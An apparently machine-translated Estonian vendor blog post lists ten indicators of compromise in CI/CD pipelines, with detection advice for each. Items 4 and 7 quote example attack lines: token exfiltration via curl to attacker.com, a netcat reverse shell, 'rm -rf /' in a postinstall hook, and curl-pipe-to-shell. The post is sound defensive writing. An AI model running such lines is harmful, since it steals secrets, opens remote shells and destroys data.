10 peamist kompromissi näitajat CI/CD Pipelines

Sissejuhatus: Mis on küberturvalisuse kompromisside näitajad?

Ohutuse indikaatorid on esimesed hoiatusmärgid, mis viitavad teie süsteemile või pipeline võib olla rünnaku all. Lihtsamalt öeldes, kompromissi näitajad on ründajate jäetud jäljed, nagu imelikud logins, failimuudatused või peidetud pahavara. ROK-i küberturvalisus, toimivad nad kuriteopaigal nagu sõrmejäljed, andes selgeid tõendeid, et midagi on valesti. Seega, kui arendajad küsivad Mis on kompromissi näitajad?, ei piirdu vastus serverite või tulemüüridega, vaid hõlmab ka tänapäevastes tehnoloogiates peituvaid riske CI/CD pipelines.

Nendes pipelineRündajad saavad koodi muuta, pahatahtlikke sõltuvusi süstida või ehitusetappe märkamatult muuta. Enamik juhendeid keskendub aga endiselt ainult serveritele või võrkudele. Seetõttu on tarkvara tarneahelast saanud üks lihtsamaid sihtmärke.

Seepärast on oluline leida kompromissi märke CI/CD pipelines on oluline. Ennekõike aitab see meeskondadel pahavara blokeerida, saladusi kaitsta ja tarkvara tarnimise iga sammu turvata.

10 peamist kompromissi näitajat CI/CD Pipelines

Ohutuse näitajate selgitamisel keskenduvad enamik loendeid serveritele või võrkudele. Ometi CI/CD pipelineRündajad jätavad maha väga erinevaid jälgi. Nende signaalide äratundmine on ennetava kaitse jaoks ülioluline. Allpool on toodud 10 IOC küberturvalisuse ohulippu, millele iga arendaja ja turvainsener peaks tähelepanu pöörama.

1. Kahtlased sõltuvuse muutused

Üks peamisi kompromissi näitajaid pipelines on ootamatu ja veider sõltuvusuuendus. Ründajad kasutavad sageli paketihaldurites arendajate poolt määratud usaldust ohtlike pakettide lisamiseks.

Näiteks npm-s a package.json erinevus võib äkki sisaldada järgmist:

+ "crypto-helper": "^1.0.2" 

Sellised muudatused võivad tunduda ohutud, kuid võivad igasse versiooni süstida trooja nakatatud koodi.

Mõju: ohustatud versioonid pärivad pahavara juba allikal.

Märkamine: jõustada sõltuvuste ülevaateid, jälgida lukustusfailide erinevusi ja skannida pidevalt uusi pakette.

2. Hägustatud kood ehitustes 

Pahavara autorid kasutavad arvustuste vältimiseks hägustamist. Seetõttu on see kompromiteerimise näitaja CI/CD pipelines-e võib olla üks raskemini tabatavaid. Tegelikult satuvad hägustatud kasulikud koormused sageli ette teatamata avatud lähtekoodiga teekidesse või konteinerkujutistesse.

Näiteks:

  • PyPI pakett, mis kasutab base64.b64decode("cHJpbnQoSGFja2VkKQ==").
  • Dockeri kujutis, mis on täis mittevajalikke UPX-binaarfaile.
  • JavaScript täis \x41\x42 põgeneb volikirjade varastajate eest peitu pugedes.

Mõju: Peidetud kood käivitatakse nii ehituse kui ka käitusaja ajal vaikselt, mis teeb sellest IOC küberturvalisuse seisukohalt kriitilise tähtsusega signaali.
Märkamine: Ühendama SAST pahavara skannimisega, et märgistada kodeeritud või pakitud kood. Ennekõike tuleks hägustamist käsitleda ohumärgina, mis väärib edasist uurimist.

3. Gitis paljastatud saladused: klassikaline IOC küberturvalisuse risk

CI/CD pipelinepärivad saladusi sageli otse hoidlatest. Siiski kui Gitis ilmuvad saladused, saavad neist üks selgemaid vastuseid küsimusele „mis on kompromissi näitajad pipelines?” Kui volitused Giti on jõudnud, saavad ründajad neid lõputult ära kasutada.

Näiteks:

  • A .env sisaldav fail AWS_SECRET_KEY=.
  • Sisse lükatud žetoonid config.json.
  • Saladused on Giti ajaloos nähtavad ka pärast eemaldamist.

Mõju: Paljastatud võtmed annavad ründajatele otsese juurdepääsu CI/CD pipelines, pilvesüsteemid või andmebaasid. Seega on see üks ohtlikumaid kompromiteerimise näitajaid.
Märkamine: Kasutama pre-commit hooks ja CI-töid salajaseks skaneerimiseks ning lekkinud võtmete viivitamatut tühistamist. Lisaks jõustage automaatsed parandusmeetmed, et vähendada kokkupuuteaknaid.

4. Muutunud Pipeline Konfiguratsioonid: varjatud kompromissi näitajad

Pipeline konfiguratsioonid on väärtuslikud sihtmärgid, sest Üksainus muudatus kaaperdab sageli kogu töövooJärelikult on võltsitud pipeline failid on IOC-i peamine küberturvalisuse risk, mida traditsioonilised jälgimisvahendid harva tuvastavad.

Näiteks:

  • GitHubi toimingutes:

- run: curl -X POST http://attacker[.]com --data $GITHUB_TOKEN
  • GitLabis: pahatahtlik töö lisatud .gitlab-ci.yml mis väljastab tundlikke andmeid.
  • Jenkinsis: sh "nc -e /bin/bash attacker.com 4444".

Mõju: Need kinnitamata muudatused muudavad teie pipeline ründajate jaoks püsivaks tagaukseks, mis loetakse selgelt kompromiteerimise näitajaks.
Märkamine: Jõustage allkirjastatud konfiguratsioonid, nõudke PR-kinnitusi ja jälgige ootamatuid töid. Lisaks määrake guardrails mis blokeerivad automaatselt muudetud töövooge.

5. Privilegeeritud IaC Defaults 

Valesti konfigureeritud infrastruktuuri definitsioonid loovad sageli varjatud tagauksi. Selle tulemusena on privilegeeritud vaikimisi IaC on klassikaline ROK-i küberturvalisuse risk.

Näiteks:

  • Kubernetes'i juurutuse abil antakse luba pod'idele privileged: true.
  • Helm kaardistab teenuseid paljastavaid diagramme 0.0.0.0:22.

Mõju: Ründajad saavad juurjuurdepääsu või seavad siseteenused avalikult nähtavale. Sellest tulenevalt laiendavad need probleemid rünnakupinda märkimisväärselt.
Märkamine: kehtima IaC skannimine, et jõustada enne ühendamist minimaalsed privileegid. Lisaks veenduge, et iga konfiguratsioon vaadatakse üle ühendamise osana. pipeline.

6. Ebatavalised ehituskäitumised 

Ründajad muudavad sageli pipeline käitumist pahatahtlike tegude sissetoomiseks. Teisisõnu, ebatavaline ehitustegevus on üks selgemaid vastuseid küsimusele, millised on ohustamise näitajad CI/CD pipelines.

Näiteks:

  • Väljaminevate võrgupäringute tegemine võõrastele domeenidele.
  • Node.js projekt käivitab ootamatult PowerShelli npm install.
  • CI-töö, mis laadib alla suuri binaarfaile, mida ehitusskriptides pole määratletud.

Mõju: Ohustatud versioonid võivad toimida pahavara levikupunktidena. Ennekõike levitavad nad pahatahtlikku sisu igas juurutuses.
Märkamine: Jälgige ehituslogisid ootamatute protsesside või ühenduste suhtes. Lisaks konfigureerige anomaaliate tuvastamine nii, et see märgistaks normist väljas olevat käitumist.

7. Pahatahtlikud paketiskriptid kui IOC küberturvalisuse riskid

Paketihaldurite tugi elutsüklile hooks mida ründajad ära kasutavad. Seega on pahatahtlikud skriptid npm-is, PyPI-s või Dockerfiles-is tugevad ohumärgid.

Näiteks:

  • npm: postinstall skript töötab rm -rf / või C2-le suunamine.
  • PyPI: setup.py peidetud Pythoni koodi käivitamine installimisel.
  • Dockeri fail: RUN curl attacker.sh | sh.

Mõju: Rünnak käivitatakse installimise ajal, enne mis tahes käitusaegset testimist. Seetõttu ei pruugi arendajad seda märgata enne, kui on liiga hilja.
Märkamine: Skannige paketi manifeste installiskriptide suhtes. Lisaks piirake riskantseid hooks in CI/CD töökohad kokkupuute vähendamiseks.

8. Registri mürgistuse ohu näitajad

Ründajad asendavad või muudavad registrites olevaid esemeid ja need sündmused on õpiku näited sellest, mis viitab tarneahela kompromiteerimisele. pipelines.

Näiteks:

  • Dockeri pildi silt värskendati vaikselt trooja kihiga.
  • Sisemine pakend asendatud mürgitatud versiooniga.
  • npm nimeruumi kükitamine, näiteks lodash-proxy.

Mõju: Iga registriartefakti kasutav järk satub ohtu. Lisaks levib oht ka allavoolu teenustele.
Märkamine: Rakendage allkirja ja terviklikkuse kontrolle kõigil registriandmete kogumisel. Lisaks jälgige artefaktide päritolu SBOM kinnitamine.

9. Anomaalne kasutajategevus IOC tõendina

Ohustatud kontod jätavad peaaegu alati maha ebanormaalseid jälgi. Seega on ebatavaline arendaja käitumine tugev näitaja kompromissist.

Näiteks:

  • Commitlükati kohaliku aja järgi kell 3 hommikul.
  • Puhkusel olevate kontode PR-kinnitused.
  • Pipelinevallandub ebatavalise sagedusega.

Mõju: Ründajad kuritarvitavad varastatud volitusi pahatahtlike muudatuste sisestamiseks. Lõppude lõpuks on volitamata commitsulanduvad kergesti tavapäraste töövoogudega.
Märkamine: Jälgida SCM anomaaliate tegevust, jõustage MFA ja vahetage regulaarselt tokeneid. Lisaks hoiatage kahtlaste juhtumite eest commit või heakskiitmismustrid.

10. Ebaõnnestunud terviklikkuse või allkirja kontrollid IOC küberturvalisuses

Levinud, aga tähelepanuta jäetud kompromissi näitaja on terviklikkuse või allkirja kontrolli ebaõnnestumine. IOC küberturvalisuses kinnitavad need kontrollid koodi või artefaktide autentsust. Nende vahelejätmine jätab pipelineon paljastatud.

Näited:

  • SHA256 räsi ei vasta oodatavale kontrollsummale.
  • Puuduv või kehtetu GPG allkiri.
  • An SBOM näitab allkirjastamata esemeid.

Mõju: Andmete terviklikkuse rikked tähendavad sageli võltsimist, registri mürgitamist või pahavara süstimist.

Märkamine: Automatiseerige allkirjade kontrollid, jõustage kontrollsumma valideerimine ja blokeerige allkirjastamata komponendid. Eelkõige käsitlege iga ebaõnnestunud kontrolli selge tõendina turvarikkumisest.

CI/CD Kompromissi näitajad lühidalt

Kompromissi indikaator (IOC)Mõju CI/CD PipelinesKuidas tuvastada
Kahtlased sõltuvuse muutusedRündajad süstivad paketihalduritesse pahatahtlikke teeke, mis viib ohtu sattunud versioonideni.Jälgige lukustusfailide erinevusi, jõustage sõltuvuste ülevaated ja skannige sõltuvusi pidevalt.
Hägustatud kood ehitustesVarjatud kasulikud koormused käivitatakse ehituse või käitusaja ajal ilma tuvastamiseta.Kasutama SAST ja pahavara skannimine base64, hex või pakitud koodimustrite märgistamiseks.
Gitis paljastatud saladusedLekkinud märgid või API-võtmed annavad ründajatele otsese juurdepääsu kriitilistele süsteemidele.Käivita Gitis salajased skaneeringud hooks ja tühistada lekkinud volitused automaatselt.
Muutunud Pipeline KonfiguratsioonidMuudetud töövood võimaldavad andmete väljavoolu või säilitamist CI/CD.Nõua PR-kinnitusi, jõusta allkirjastatud konfiguratsioonid ja jälgi pipeline muudatused.
Privilegeeritud IaC DefaultsLiiga leebe rollide või ebaturvaliste vaikesätete kasutamine seab pilvekeskkonnad ohtu.Skannige Terraformi, Kubernetesi ja Helmi faile minimaalsete õiguste jõustamiseks.
Ebatavalised ehituskäitumisedPipelinekasutatakse pahavara levituspunktidena või külgmiseks liikumiseks.Analüüsige ootamatute allalaadimiste, protsesside või väljaminevate kõnede ehituslogisid.
Pahatahtlikud paketiskriptidPeidetud eel- ja järelinstallimisskriptid käivitavad enne käitusaja testimist kasulikke koormusi.Blokeeri riskantsed npm/PyPI skriptid ja piira nende täitmist CI/CD töökohti.
Registri mürgistusTrooja nakatatud esemed asendavad registrites usaldusväärseid kujutisi või binaarfaile.Kontrollige kontrollsummasid, jõustage allkirjade valideerimine ja skannige registreid ennetavalt.
Anomaalne kasutajategevusOhustatud kontod levitavad pahatahtlikke commits või päästik pipelines.Jõusta MFA, jälgi commitanomaaliate suhtes ja analüüsige login mustrid.
Ebaõnnestunud terviklikkuse või allkirja kontrollidNäitab manipuleeritud koodi, sõltuvusi või pilte, mis sisenevad pipeline.Automatiseerige terviklikkuse kontrollid ja blokeerige allkirjastamata või mittevastavad komponendid.

Miks traditsiooniline ROK-i küberturvalisus ebaõnnestub? CI/CD Riskid

Enamik organisatsioone jälgib juba serverite, arvutite või võrkude kompromiteerimise näitajaid. See klassikaline lähenemine IOC küberturvalisusele aga ignoreerib CI/CD pipelines, mis on nüüd üks kriitilisemaid rünnakupindu. Tegelikult pipelinenäitavad unikaalseid kompromissisignaale, mida traditsioonilised tööriistad ei suuda tuvastada.

Traditsioonilise julgeoleku kompromissi näitajad

Tavapärases IOC küberturvalisuses keskendutakse tavaliselt järgmisele:

  • ebatavaline logine-kirjad või IP-aadressid, mis viitavad varastatud volitustele.
  • Kahtlased failiräsi või registrimuudatused, mis paljastavad pahavara.
  • Ootamatu väljaminev liiklus, mis viitab andmete väljavoolule.

Need on tuntud näitajad, mida jälgitakse ka MITER ATT&CK raamistik, mis kaardistab vastaste tavalisi käitumisviise ja taktikaid. Need on kasulikud signaalid. Siiski kehtivad need peamiselt operatsioonisüsteemide või ettevõtte võrkude kohta. Seetõttu ei märka nad peent manipuleerimist, mis toimub tarkvara tarneahela varasemas etapis.

Miks CI/CD Pipelines on erinevad

CI/CD pipelineon automatiseeritud keskkonnad, kus arendajad commit kood, pull-sõltuvused ja versiooniuuendused. Ründajad teavad, et üks rünnak siin kandub üle igale juurutusele. Seega, millised on rünnaku näitajad CI/CD pipelineNad näevad välja väga erinevad:

  • Pahatahtlik sõltuvus, mis on vaikselt lisatud faili package.json või requirements.txt.
  • Gitis avaldatud API-võtmed või märgid commits- või .env-failid.
  • Npm- või PyPI-pakettidesse süstitud hägustatud kood.
  • Terraformi või Kubernetesi failid ebaturvaliste vaikesätetega, näiteks privileged: true.
  • Pipeline töökohti, mida on muudetud andmete väljafiltreerimiseks või tagauste avamiseks.

Need kompromisssignaalid CI/CD jäävad nähtamatuks standard turvatööriistad.

ROK-i küberturvalisuse lünk

Kuigi paljud meeskonnad mõistavad kompromiteerimise indikaatorite väärtust, tuginevad nad siiski ainult serverite ja võrgulogide kaudu tuvastamisele. Seetõttu saavad ründajad mürgitada versioone või sisestada pahavara ilma tavapäraseid jälgi jätmata. Seetõttu jäid sellised intsidendid nagu XZ Utilsi tagauks või pahatahtlikud npm-paketid avastamata enne tootmiskeskkonda jõudmist.

Selliseid tarneahela kompromisse rõhutavad ka CISA tarneahela turvalisuse juhised, mis hoiatab, et ründajad sihivad üha enam CI/CD pipelines ja registrid.

Buffee

Traditsiooniline IOC küberturvalisus on vajalik, kuid sellest ei piisa. Ennekõike peavad meeskonnad ära tundma konkreetsele ettevõttele omaseid ohustamise märke. CI/CD pipelineAlles siis saavad nad tuvastada pahatahtlikku koodi või pipeline kuritarvitamine enne, kui see levib teistesse keskkondadesse.

sca-tööriistad-tarkvara-kompositsiooni-analüüsi-tööriistad
Tarkvarariskide prioriseerimine, leevendamine ja turvamine
Hankige oma tasuta konto.
Krediitkaarti pole vaja.

Turvaline tarkvaraarendus ja -tarne

Xygeni tootekomplektiga